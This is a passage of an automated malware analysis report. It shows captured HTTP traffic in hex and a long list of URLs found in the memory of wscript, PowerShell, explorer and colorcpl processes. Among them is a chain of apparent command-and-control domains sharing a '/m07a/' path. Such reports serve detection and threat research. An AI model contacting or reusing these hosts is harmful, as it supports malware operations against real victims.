d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 19:12:52 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 78 61 73 76 63 64 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.xasvcd.xyz Port 80</address></body></html>
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: powershell.exe, 00000001.00000002.2263421531.000001DC582E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: explorer.exe, 00000006.00000000.1807070242.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
            Source: explorer.exe, 00000006.00000000.1812503144.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
            Source: explorer.exe, 00000006.00000002.2940547809.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2936778344.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1801712063.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: powershell.exe, 00000001.00000002.2217742539.000001DC40059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820058355.0000029F05781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apexu.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apexu.xyz/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apexu.xyz/m07a/www.nacob.top
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apexu.xyzReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.auralights.store
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.auralights.store/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.auralights.store/m07a/www.potentpolitics.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.auralights.storeReferer:
            Source: explorer.exe, 00000006.00000002.2944714584.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.balancceer.top
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.balancceer.top/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.balancceer.top/m07a/www.auralights.store
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.balancceer.topReferer:
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lunazone.us
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lunazone.us/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lunazone.us/m07a/www.balancceer.top
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lunazone.usReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.com/m07a/www.qdaoxingsujiao.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.com/m07a/www.shakishaskakes.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.top
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.top/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.top/m07a/www.matchuplover.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.topReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.com/m07a/www.welqi.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.com/m07a/www.yipaijihejiaoyu.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.com/m07a/www.workproapi.site
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.royal-buttons.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.royal-buttons.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.royal-buttons.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.com/m07a/www.xasvcd.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.com/m07a/www.propertiesfinance.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.site
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.site/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.site/m07a/www.royal-buttons.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.siteReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyz/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyz/m07a/www.lunazone.us
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyzReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.com/m07a/www.apexu.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.comReferer:
            Source: explorer.exe, 00000006.00000002.2944714584.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: powershell.exe, 00000001.00000002.2217742539.000001DC3FFDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000001.00000002.2217742539.000001DC4002C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820058355.0000029F05781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000006.00000000.1790977518.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2931305146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2932559264.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000006.00000000.1807070242.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000006.00000000.1807070242.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
